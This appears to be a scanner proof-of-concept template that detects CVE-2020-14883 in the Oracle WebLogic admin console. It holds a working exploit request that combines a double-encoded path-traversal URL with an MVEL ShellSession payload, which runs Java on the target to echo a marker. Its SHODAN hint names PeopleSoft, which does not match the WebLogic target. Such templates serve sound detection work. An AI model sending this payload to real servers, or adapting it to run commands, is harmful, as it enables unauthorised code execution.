id: CVE-2020-14883

info:
  name: Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution
  author: pdteam,vicrack
  severity: high
  verified: true
  description: |
    The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
    SHODAN: title:"Oracle PeopleSoft Sign-in"
  reference:
    - https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
    - https://www.oracle.com/security-alerts/cpuoct2020.html
    - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
  tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020
  created: 2023/08/17

set:
  hostname: request.url.host
  str: "cve-2020-14883"
  revstr: "38841-0202-evc"
rules:
  r0:
    request:
      raw: |
        POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
        Host: {{hostname}}
        Accept-Language: en
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate
     
        test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String result = new StringBuilder("{{str}}").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')
    expression: response.status == 200 && response.body.bcontains(bytes(revstr)) && response.raw_header.bcontains(b'ADMINCONSOLESESSION')
expression: r0()